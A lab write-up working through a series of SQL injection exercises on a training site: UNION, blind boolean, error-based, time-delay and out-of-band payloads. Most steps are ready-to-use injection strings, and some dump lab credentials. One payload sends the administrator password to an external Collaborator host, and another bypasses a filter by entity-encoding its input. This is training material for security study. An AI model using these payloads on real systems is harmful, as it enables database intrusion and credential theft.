• To solve the lab, performing an SQL injection attack that causes the application to display one or more unreleased products.

(a) Clothing, shoes and accessories Page :

(b) Add to the URL :

• +OR+1=1--

---

• To solve the lab, performing an SQL injection attack that logs in to the application as the administrator user.

(a) Log-IN :

• UserName : administrator

(b) Logs in to the application as the administrator user.

---

• Using a UNION attack to retrieve the results from an injected query.

• To solve the lab, displaying the database version string.

(a) First we check the number of columns by injecting null values with dual for oracle database.

• category=Tech Gifts'+union+select+null,null+from+dual--

(b) Then we give SELECT * FROM v$version to retreive the Oracle database info

• category=Tech Gifts'+union+select+null,banner+from+v$version--

• Trying for Another Category

---

• Using a UNION attack to retrieve the results from an injected query.

• To solve the lab, displaying the database version string.

(a) First we have to check the number of columns and string match :

• category=Lifestyle+union+select+null,'a'--

(b) Then we give select @@version for MySQL and Microsoft version and %23 for # to comment out.

• category=Lifestyle'+union+select+null,@@version%23

---

• About
  • The results from the query are returned in the application's response, so we are using a UNION attack to retrieve data from other tables.
  • The application has a login function, and the database contains a table that holds usernames and passwords.
  • We are now determining the name of this table and the columns it contains, then retrieving the contents of the table to obtain the username and password of all users.
  • To solve the lab, we are logging in as the administrator user.

(a) First we list the tables by using information_schema.tables query

• category=Gifts'+union+select+table_name,+null+from+information_schema.tables--

(b) Now we select column names from the table users_ebdodv

• category=Gifts'+union+select+column_name,+null+from+information_schema.columns+where+table_name='users_ebdodv'--

(c) Now we get the Credentials

(d) Now we enumerate all user credentials by above info

• category=Pets'+union+select+username_ixiyhx,+password_eocpkk+from+users_ebdodv--
• We got the administrator password and logged in to solve the lab.

(e) Now we are trying to Login as administrator with the password generated

• Logged in successfully as an administrator :

---

• About
  • The results from the query are returned in the application's response, so we are using a UNION attack to retrieve data from other tables.
  • The application has a login function, and the database contains a table that holds usernames and passwords.
  • We are determining the name of this table and the columns it contains, then retrieving the contents of the table to obtain the username and password of all users.
  • To solve the lab, logging in as the administrator user.

(a) First we list the tables

• category=Pets'+union+select+table_name,null+from+all_tables--

(b) Then we check for users' table

• category=Pets%27+union+select+column_name,null+from+all_tab_columns+where+table_name=%27USERS_PJXZUN%27--

• Now we get the Credentials

(c) Now we enumerate all user credentials by above info

• category=Pets'+union+select+USERNAME_QEEVWD,+PASSWORD_EPOMRV+from+USERS_PJXZUN--
• We got the user Credentials

(e) Now we are trying to Login as administrator with the password generated

• Logged in successfully as an administrator :

• Logging in as carlos with their Credentials provided
  • Successfully logged-in as carlos.

---

• About

  • This lab contains a SQL injection vulnerability in the product category filter.
  • Using a UNION attack to retrieve the results from an injected query.
  • To solve the lab, displaying the database version string.

• The first step of such an attack is to determine the number of columns that are being returned by the query.

• To solve the lab, We are determining the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values.

(a) Category - LIFESTYLE :

(b) Using one and two null values will gives us Internal Server Error due to non-matching of null values with number of columns.

• category='Lifestyle'+union+select+null,null,.....<No of null occurences> --
• category=Lifestyle+union+select+null--

(c) Using third null will match the number of columns :

• category=Lifestyle'+union+select+null,null,null--

---

• About

  • The results from the query is returned in the application's response, so we are using a UNION attack to retrieve data from other tables.

  • To construct such an attack, we first need to determine the number of columns returned by the query.

  • The lab will provide a random value that we need to make appear within the query results.

  • To solve the lab, we are performing a SQL injection UNION attack that returns an additional row containing the value provided.

  • This technique helps us to determine which columns are compatible with string data.

  • Make the database retrieve the string: y4d3eF

(a) First we have to determine the number of columns of the category by using NULL values.

• category=Pets+union+select+null,null,null--

(b) Then we have to check which column contains string by replacing null with a for each column

• 1st : category=Pets'+union+select+'a',null,null--
  • Internal Server Error

• 2nd : category=Pets'+union+select+null,'a',null--
  • String

• 3rd : category=Pets'+union+select+null,null,'a'--
  • Internal Server Error

• From the above 3, we can observe that we got the 2nd column as string. So, we replace a with the desired string : y4d3eF

---

• About

  • The results from the query are returned in the application's response, so are using a UNION attack to retrieve data from other tables.

  • The database contains a different table called users, with columns called username and password.

  • To solve the lab, we are performing a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

(a) First we determine 2 number of columns by running null values and a for confirming that it contains 2 string values.

• category=Pets'+union+select+'a','a'--

(b) Then we give the username and password from users table

• category=Pets'+union+select+username,password+from+users--

(c) Retrieving the user credentials.

(d) Logging in with the Credentials

• As Administrator

• As Wiener

• As Carlos

Just a Check :

• Trying with invalid Credentials.
  • Invalid User Credentials doesn't log in.

---

• About

  • The results from the query are returned in the application's response, so we are using a UNION attack to retrieve data from other tables.

  • The database contains a different table called users, with columns called username and password.

  • To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

(a) First we have to check the number of columns :

• category=Pets'+union+select+null,null--

(b) Then we check for the string related column :

• category=Pets'+union+select+null,null,'a'--

(c) Then we give username and password as concatenated string

• category=Pets+union+select+null,username||'~'||password+from+users--
• User credentials with ~ separator

(d) Logging in with the provided credentials

• logged in

---

• About

  • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
  • The results of the SQL query are not returned, and no error messages are displayed. But the application includes a "Welcome back" message in the page if the query returns any rows.
  • The database contains a different table called users, with columns called username and password.
  • We need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
  • To solve the lab, logging in as the administrator user.

• Steps For Burp Suite

  • Open Burp Suite Community Edition

  • Go to PROXY Tab

  • Select : OPEN BROWSER

  • Now, Paste the Link of the Experiment Page in the Opened Website

  • Go Back to Burp Suite, Turn ON INTERCEPT

  • Go to Browser and Select : MY ACCOUNT

  • Go to Burp Suit, Keep forwarding the DATA available until you get COOKIE TRACKINGID

  • Once you get the ID, Right Click and Select : SEND TO REPEATER

• PROXY TAB

• REPEATER TAB

(a) Perform SQL injection in place of Cookie TrackingID and Search for Welcome Back Message

• Type TrackingId=xyz' AND '1'='1 and Click on SEND

• Welcome Back Message appears...

• Type TrackingId=xyz' AND '1'='2 and Click on SEND

• Welcome Back Message Disappears...

(b) Check whether there is a TABLE named USERS

• Type TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a and Click on SEND

• Welcome Back Message appears... USERS Table Exists

(c) Check whether there is a USER called ADMINISTRATOR

• Type TrackingId=xyz'+union+select+'a'+from+users+where+username='administrator'-- and Click on SEND

• Welcome Back Message appears... USER called ADMINISTRATOR Exists

(d) Determining how many characters are in the password of the administrator user

• Type TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a and Click on SEND

• TrackingId=x'+union+select+'a'+from+users+where+username='administrator'+and+length(password)>1--

  TrackingId=x'+union+select+'a'+from+users+where+username='administrator'+and+length(password)>2--

  TrackingId=x'+union+select+'a'+from+users+where+username='administrator'+and+length(password)>3--

  . . .

• 19th Trial

  • Welcome back is still appearing

• 20th Trial

  • The WELCOME BACK message Disappears

  • This condition should be true, confirming that the password is greater than 1 character in length.

(e) Send to INRTUDER

• Add : §

(f) Check for Password length by running Numbers Payload

(g) Grep-Match : Add - Welcome Back

(h) Start ATTACK

(i) Guessing Administrator Password

• Add the following

1st Character of the PASSWORD : z

• Change the Code to SUBSTRING(password,2,1) for the 2nd Character

2nd Character of the PASSWORD : k

3rd Character of the PASSWORD : 0

4th Character of the PASSWORD : i

5th Character of the PASSWORD : 1

6th Character of the PASSWORD : d

7th Character of the PASSWORD : r

8th Character of the PASSWORD : q

9th Character of the PASSWORD : x

10th Character of the PASSWORD : o

11th Character of the PASSWORD : w

12th Character of the PASSWORD : n

13th Character of the PASSWORD : 3

14th Character of the PASSWORD : s

15th Character of the PASSWORD : t

16th Character of the PASSWORD : u

17th Character of the PASSWORD : a

18th Character of the PASSWORD : 8

19th Character of the PASSWORD : 3

20th Character of the PASSWORD : 2

• PASSWORD FORMED : zk0i1drqxown3stua832

---

• About

  • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
  • The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows.
  • If the SQL query causes an error, then the application returns a custom error message.
  • The database contains a different table called users, with columns called username and password.
  • We are exploiting the blind SQL injection vulnerability to find out the password of the administrator user.
  • To solve the lab, log in as the administrator user.

• PROXY TAB

• REPEATER TAB

(a) Appending a single quotation mark to the TrackingID

• TrackingId=xyz'

Internal Server Error

(b) Appending a single quotation mark to the TrackingID

• TrackingId=xyz''

HTTP/2 200 OK

(c) Appending '||(SELECT '')||' to the TrackingID

(d) Appending '||(SELECT '' FROM dual)||' to the TrackingID

As we no longer receive an error, this indicates that the target is probably using an Oracle database, which requires all SELECT statements to explicitly specify a table name.

(e) Try querying a non-existent table name:

This time, an error is returned. This behavior strongly suggests that your injection is being processed as a SQL query by the back-end.

(f) Try querying an existent table name:

As this query does not return an error, we can infer that this table does exist.

Note that the WHERE ROWNUM = 1 condition is important here to prevent the query from returning more than one row, which would break our concatenation.

(g) You can also exploit this behavior to test conditions.

Error Message is Received

(h) You can trigger an error conditionally on the truth of a specific condition.

Error Disappears

The CASE statement tests a condition and evaluates to one expression if the condition is true, and another expression if the condition is false. The former expression contains a divide-by-zero, which causes an error. In this case, the two payloads test the conditions 1=1 and 1=2, and an error is received when the condition is true.

(i) Testing whether specific entries exist in a table

• TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
• User : Administrator

Verifying that the condition is true (the error is received), confirming that there is a user called administrator.

(j) Characters in the Password of administrator user

• TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'

We get the Error --> So that means the password is greater than 1 character in length.

Giving : 19

Giving : 20

When the condition stops being true (i.e. when the error disappears), we have determined the length of the password, which is in fact 20 characters long.

(k) Length via Intruder

• Payload Positions

• Payload Cofigurations

• Starting Attack

Here we can see it is 20 in length.

(l) Finding Password

• TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'

• Payload Configuration

Add a-z and 0-9

• Start Attack to find all the Characters

1st Character : l

2nd Character : 5

3rd Character : 9

4th Character : c

5th Character : 7

6th Character : y

7th Character : h

8th Character : 4

9th Character : w

10th Character : t

11th Character : o

12th Character : 5

13th Character : l

14th Character : 3

15th Character : 7

16th Character : s

17th Character : v

18th Character : x

19th Character : 0

20th Character : 6

• PASSWORD FORMED : l59c7yh4wto5l37svx06

---

• About

  • The application uses a tracking cookie for analytics and performs a SQL query containing the value of the submitted cookie.
  • The results of the SQL query are not returned.
  • The database contains a different table called users, with columns called username and password.
  • To solve the lab, we are finding a way to leak the password for the administrator user, then log in to their account.

(a) TrackingID

• Proxy > HTTP history tab and find a GET / request that contains a TrackingId cookie.

(b) Adapt the query to include a generic SELECT subquery and cast the returned value to an int data type :

Send the request.

Observe that we now get a different error saying that an AND condition must be a Boolean expression.

(c) Modify the condition accordingly

Send the request. Confirm that you no longer receive an error. This suggests that this is a valid query again.

(d) Adapt your generic SELECT statement so that it retrieves usernames from the database :

Observe that you receive the initial error message again.

Notice that your query now appears to be truncated due to a character limit. As a result, the comment characters you added to fix up the query aren't included.

(e) Delete the original value of the TrackingId cookie to free up some additional characters. Resend the request.

Notice that you receive a new error message, which appears to be generated by the database.

This suggests that the query was run properly, but you're still getting an error because it unexpectedly returned more than one row.

(f) Modify the query to return only one row:

• TrackingId=' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--

ERROR: invalid input syntax for type integer: "administrator"

(g) Now that you know that the administrator is the first user in the table, modify the query once again to leak their password:

TrackingId=' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--

• Password Generated : ntvpfj49vdtgstvx6x3f

(h) Logging In

---

• About

  • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
  • The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error.
  • However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
  • To solve the lab, exploit the SQL injection vulnerability to cause a 10 second delay.

(a) Visit the front page of the shop, and use Burp Suite to intercept and modify the request containing the TrackingId cookie.

• At Proxy

• After sending to the Intruder

(b) Modify the TrackingId cookie, changing it to:

• TrackingId=x'||pg_sleep(10)--

Send it from Intruder to the Repeater

Now Send it to the Response

It'll take 10 Seconds to APPEAR or DISPLAY (DELAY)

SOLVED

---

• About

  • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
  • The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error.
  • However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
  • The database contains a different table called users, with columns called username and password.
  • You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
  • To solve the lab, log in as the administrator user.

(a) TrackingID

(b) Modifying the request containing TrackingID

• TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--

We will observe that we got the Response after 10 Seconds (It had Time Delay)

(b) Modifying the request containing TrackingID

• TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--

We will observe that we got the Response immediately (It had NO Time Delay)

A single Boolean condition can change the Response.

(c) Conforming whether there's a User called Administrator

• TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

If it's True, it takes 10 Seconds to Respond.

(d) Determining the Characters in the Password

• TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
• It takes 10 Seconds to Respond

If it's true, then the Response takes 10 Seconds to respond.

• Keep Sending until the condition satisfies

TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>3)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

. . .

During the 20th Trial, we get the Response Immediately.

• TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>20)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

• So, that means the Length of the password is 20 Characters.

(e) Burp Intruder

• Payload settings

• Starting the Attack

We will observe that there will be 10 seconds delay for each outcome until 20th iteration, after the 20th iteration we will get immediate response.

(f) Change the TrackingID

• TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

• Characters are the ones which take 10 Seconds time to appear (other characters appear immediately)

1st Character : 4

2nd Character : b

3rd Character : i

4th Character : 4

5th Character : z

6th Character : m

7th Character : 9

8th Character : 2

9th Character : j

10th Character : e

11th Character : z

12th Character : y

13th Character : j

14th Character : z

15th Character : s

16th Character : s

17th Character : y

18th Character : e

19th Character : 3

20th Character : e

• PASSWORD FORMED : 4bi4zm92jezyjzssye3e

(f) Logging In

SOLVED

---

• About

  • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
  • The SQL query is executed asynchronously and has no effect on the application's response.
  • However, you can trigger out-of-band interactions with an external domain.
  • To solve the lab, exploit the SQL injection vulnerability to cause a DNS lookup to Burp Collaborator.

(a) TrackingID

(b) Modifying TrackingID

• TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

Right-click and select Insert Collaborator payload to insert a Burp Collaborator subdomain where indicated in the modified TrackingId cookie.

SOLVED

---

• About

  • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
  • The SQL query is executed asynchronously and has no effect on the application's response.
  • However, you can trigger out-of-band interactions with an external domain.
  • The database contains a different table called users, with columns called username and password.
  • You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
  • To solve the lab, log in as the administrator user.

(a) TrackingID

(b) Modify the TrackingID

• Changing it to a payload that will leak the administrator's password in an interaction with the Collaborator server.

• For example, you can combine SQL injection with basic XXE techniques.

• TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

Right-click and select Insert Collaborator payload to insert a Burp Collaborator subdomain where indicated in the modified TrackingId cookie.

• Go to the Collaborator tab, and click Poll now.

• If you don't see any interactions listed, wait a few seconds and try again, since the server-side query is executed asynchronously.

• You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload.

• The password of the administrator user should appear in the subdomain of the interaction, and you can view this within the Collaborator tab.

• For DNS interactions, the full domain name that was looked up is shown in the Description tab.

• For HTTP interactions, the full domain name is shown in the Host header in the Request to Collaborator tab.

• In the browser, click My account to open the login page.

• Use the password to log in as the administrator user.

SOLVED

---

• About

  • This lab contains a SQL injection vulnerability in its stock check feature.
  • The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables.
  • The database contains a users table, which contains the usernames and passwords of registered users.
  • To solve the lab, perform a SQL injection attack to retrieve the admin user's credentials, then log in to their account.

(a) Open Burp Suite

• Follow the Steps :

  • Open Burp Suite
  • Open Browser
  • Paste the link in the Default Brower opened
  • In the Default Browser opened, go to the Product (Select the View Details)
  • Turn ON : INTERCEPT
  • Click : CHECK STOCK

Observe that the stock check feature sends the productId and storeId to the application in XML format.

• Send the POST /product/stock request to Burp Repeater.

  • Right Click > Sent to Repeater
  • Send

(b) Burp Repeater

• Probe the storeId to see whether your input is evaluated.

• For example, try replacing the ID with mathematical expressions that evaluate to other potential IDs

• <storeId>1+1</storeId>

Observe that the input appears to be evaluated by the application, returning the stock for different stores.

(c) Determining the number of columns returned by the original query

• By appending a UNION SELECT statement to the original store ID

  • <storeId>1 UNION SELECT NULL</storeId>

Observe that your request has been blocked due to being flagged as a potential attack.

(d) Obfuscating payload using XML entities

• Highlight your Input > Right-click > Extensions > Hackvertor > Encode > dec_entities/hex_entities.

• <storeId><@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities></storeId>

(e) Logging In to their Accounts

username ~ password

• Credentials :

  • carlos ~ vg5ziyj5vgq59mpjtq2j

  • administrator ~ rdxwmpheiisakm0evnkd

  • wiener ~ y4gbezbjt0fngtgxt3mi

• Administrator